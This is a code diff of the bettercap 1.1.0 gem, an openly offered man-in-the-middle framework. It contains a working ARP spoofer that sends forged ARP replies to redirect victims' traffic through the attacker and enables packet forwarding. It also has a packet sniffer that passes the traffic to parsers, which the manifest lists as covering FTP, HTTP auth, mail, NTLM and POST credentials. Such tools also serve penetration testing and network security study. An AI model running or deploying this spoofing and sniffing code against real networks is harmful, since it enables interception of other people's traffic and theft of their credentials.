bettercap 1.1.0

data/lib/bettercap/sniffer/sniffer.rb

@@ -0,0 +1,39 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+require 'bettercap/logger'
+require 'bettercap/factories/parser_factory'
+require 'colorize'
+require 'packetfu'
+
+class Sniffer
+  include PacketFu
+
+  @@parsers = nil
+
+  def self.start( ctx )
+    Logger.info 'Starting sniffer ...'
+
+    @@parsers = ParserFactory.load_by_names ctx.options[:parsers]
+
+    cap = Capture.new(:iface => ctx.options[:iface], :start => true)
+    cap.stream.each do |p|
+      pkt = Packet.parse p
+      if not pkt.nil? and pkt.is_ip?
+        next if ( pkt.ip_saddr == ctx.iface[:ip_saddr] or pkt.ip_daddr == ctx.iface[:ip_saddr] ) and !ctx.options[:local]
+
+        @@parsers.each do |parser|
+          parser.on_packet pkt
+        end
+      end
+    end
+  end
+end

data/lib/bettercap/spoofers/arp.rb

@@ -0,0 +1,130 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+require 'bettercap/error'
+require 'bettercap/context'
+require 'bettercap/base/ispoofer'
+require 'bettercap/network'
+require 'bettercap/logger'
+require 'colorize'
+
+class ArpSpoofer < ISpoofer
+  def initialize
+    @ctx          = Context.get
+    @gw_hw        = nil
+    @forwarding   = @ctx.firewall.forwarding_enabled?
+    @spoof_thread = nil
+    @running      = false
+
+    Logger.debug 'ARP SPOOFER SELECTED'
+
+    Logger.info "Getting gateway #{@ctx.gateway} MAC address ..."
+    @gw_hw = Network.get_hw_address( @ctx.iface, @ctx.gateway )
+    if @gw_hw.nil?
+      raise BetterCap::Error, "Couldn't determine router MAC"
+    end
+
+    Logger.info "  Gateway MAC   : #{@gw_hw}"
+  end
+
+  def send_spoofed_packed( saddr, smac, daddr, dmac )
+    pkt = PacketFu::ARPPacket.new
+    pkt.eth_saddr = smac
+    pkt.eth_daddr = dmac
+    pkt.arp_saddr_mac = smac
+    pkt.arp_daddr_mac = dmac
+    pkt.arp_saddr_ip = saddr
+    pkt.arp_daddr_ip = daddr
+    pkt.arp_opcode = 2
+
+    pkt.to_w(@ctx.iface[:iface])
+  end
+
+  def start
+    stop() unless @running == false
+
+    Logger.info 'Starting ARP spoofer ...'
+
+    if @forwarding == false
+      Logger.debug 'Enabling packet forwarding.'
+
+      @ctx.firewall.enable_forwarding(true)
+    end
+
+    @running = true
+    @spoof_thread = Thread.new do
+      prev_size = @ctx.targets.size
+      loop do
+        if not @running
+            Logger.debug 'Stopping spoofing thread ...'
+            Thread.exit
+            break
+        end
+
+        size = @ctx.targets.size
+
+        if size > prev_size
+          Logger.warn "Aquired #{size - prev_size} new targets."
+        elsif size < prev_size
+          Logger.warn "Lost #{prev_size - size} targets."
+        end
+
+        Logger.debug "Spoofing #{@ctx.targets.size} targets ..."
+
+        @ctx.targets.each do |target|
+          # targets could change, update mac addresses if needed
+          if target.mac.nil?
+            Logger.warn "Getting target #{target.ip} MAC address ..."
+
+            hw = Network.get_hw_address( @ctx.iface, target.ip, 1 )
+            if hw.nil?
+              Logger.warn "Couldn't determine target MAC"
+              next
+            else
+              Logger.info "  Target MAC    : #{hw}"
+
+              target.mac = hw
+            end
+          end
+
+          send_spoofed_packed @ctx.gateway,    @ctx.iface[:eth_saddr], target.ip, target.mac
+          send_spoofed_packed target.ip, @ctx.iface[:eth_saddr], @ctx.gateway,    @gw_hw
+        end
+
+        prev_size = @ctx.targets.size
+
+        sleep(1)
+      end
+    end
+  end
+
+  def stop
+    raise 'ARP spoofer is not running' unless @running
+
+    Logger.info 'Stopping ARP spoofer ...'
+
+    Logger.debug "Resetting packet forwarding to #{@forwarding} ..."
+    @ctx.firewall.enable_forwarding( @forwarding )
+
+    @running = false
+    @spoof_thread.join
+
+    Logger.info "Restoring ARP table of #{@ctx.targets.size} targets ..."
+
+    @ctx.targets.each do |target|
+      if !target.mac.nil?
+        send_spoofed_packed @ctx.gateway,    @gw_hw,     target.ip, target.mac
+        send_spoofed_packed target.ip, target.mac, @ctx.gateway,    @gw_hw
+      end
+    end
+    sleep 1
+  end
+end

data/lib/bettercap/spoofers/none.rb

@@ -0,0 +1,23 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+require 'bettercap/base/ispoofer'
+require 'bettercap/logger'
+
+class NoneSpoofer < ISpoofer
+  def initialize
+    Logger.warn 'Spoofing disabled.'
+  end
+
+  def start; end
+
+  def stop; end
+end

data/lib/bettercap/target.rb

@@ -0,0 +1,52 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+require 'bettercap/logger'
+
+class Target
+    attr_accessor :ip, :mac, :vendor, :hostname
+
+    @@prefixes = nil
+
+    def initialize( ip, mac )
+        @ip = ip
+        @mac = mac
+        @vendor = Target.lookup_vendor(mac) if not mac.nil?
+        @hostname = nil # for future use
+    end
+
+    def mac=(value)
+        @mac = value
+        @vendor = Target.lookup_vendor(@mac) if not @mac.nil?
+    end
+
+    def to_s
+        "#{@ip} : #{@mac}" + ( @vendor ? " ( #{@vendor} )" : "" )
+    end
+
+private
+
+    def self.lookup_vendor( mac )
+        if @@prefixes == nil
+            Logger.debug 'Preloading hardware vendor prefixes ...'
+
+            @@prefixes = {}
+            filename = File.dirname(__FILE__) + '/hw-prefixes'
+            File.open( filename ).each do |line|
+                if line =~ /^([A-F0-9]{6})\s(.+)$/
+                    @@prefixes[$1] = $2
+                end
+            end
+        end
+
+        @@prefixes[ mac.split(':')[0,3].join('').upcase ]
+    end
+end

data/lib/bettercap/version.rb

@@ -0,0 +1,14 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+module BetterCap
+  VERSION = '1.1.0'
+end

metadata

@@ -0,0 +1,129 @@
+--- !ruby/object:Gem::Specification
+name: bettercap
+version: !ruby/object:Gem::Version
+  version: 1.1.0
+platform: ruby
+authors:
+- Simone Margaritelli
+autorequire: 
+bindir: bin
+cert_chain: []
+date: 2015-07-22 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: colorize
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: 0.7.5
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: 0.7.5
+- !ruby/object:Gem::Dependency
+  name: packetfu
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: 1.1.10
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: 1.1.10
+- !ruby/object:Gem::Dependency
+  name: pcaprub
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: 0.12.0
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ~>
+      - !ruby/object:Gem::Version
+        version: 0.12.0
+description: A complete, modular, portable and easily extensible MITM framework.
+email: evilsocket@gmail.com
+executables:
+- bettercap
+extensions: []
+extra_rdoc_files: []
+files:
+- lib/bettercap/base/ifirewall.rb
+- lib/bettercap/base/ispoofer.rb
+- lib/bettercap/context.rb
+- lib/bettercap/discovery/arp.rb
+- lib/bettercap/discovery/icmp.rb
+- lib/bettercap/discovery/syn.rb
+- lib/bettercap/discovery/udp.rb
+- lib/bettercap/error.rb
+- lib/bettercap/factories/firewall_factory.rb
+- lib/bettercap/factories/parser_factory.rb
+- lib/bettercap/factories/spoofer_factory.rb
+- lib/bettercap/firewalls/linux.rb
+- lib/bettercap/firewalls/osx.rb
+- lib/bettercap/hw-prefixes
+- lib/bettercap/logger.rb
+- lib/bettercap/monkey/packetfu/utils.rb
+- lib/bettercap/network.rb
+- lib/bettercap/proxy/module.rb
+- lib/bettercap/proxy/proxy.rb
+- lib/bettercap/proxy/request.rb
+- lib/bettercap/proxy/response.rb
+- lib/bettercap/shell.rb
+- lib/bettercap/sniffer/parsers/base.rb
+- lib/bettercap/sniffer/parsers/ftp.rb
+- lib/bettercap/sniffer/parsers/httpauth.rb
+- lib/bettercap/sniffer/parsers/https.rb
+- lib/bettercap/sniffer/parsers/irc.rb
+- lib/bettercap/sniffer/parsers/mail.rb
+- lib/bettercap/sniffer/parsers/ntlmss.rb
+- lib/bettercap/sniffer/parsers/post.rb
+- lib/bettercap/sniffer/parsers/url.rb
+- lib/bettercap/sniffer/sniffer.rb
+- lib/bettercap/spoofers/arp.rb
+- lib/bettercap/spoofers/none.rb
+- lib/bettercap/target.rb
+- lib/bettercap/version.rb
+- bin/bettercap
+- LICENSE
+- README.md
+- bettercap.gemspec
+- example_proxy_module.rb
+homepage: http://github.com/evilsocket/bettercap
+licenses:
+- GPL3
+metadata: {}
+post_install_message: 
+rdoc_options:
+- --charset=UTF-8
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - '>='
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - '>='
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubyforge_project: 
+rubygems_version: 2.0.14
+signing_key: 
+specification_version: 4
+summary: A complete, modular, portable and easily extensible MITM framework.
+test_files: []
+has_rdoc: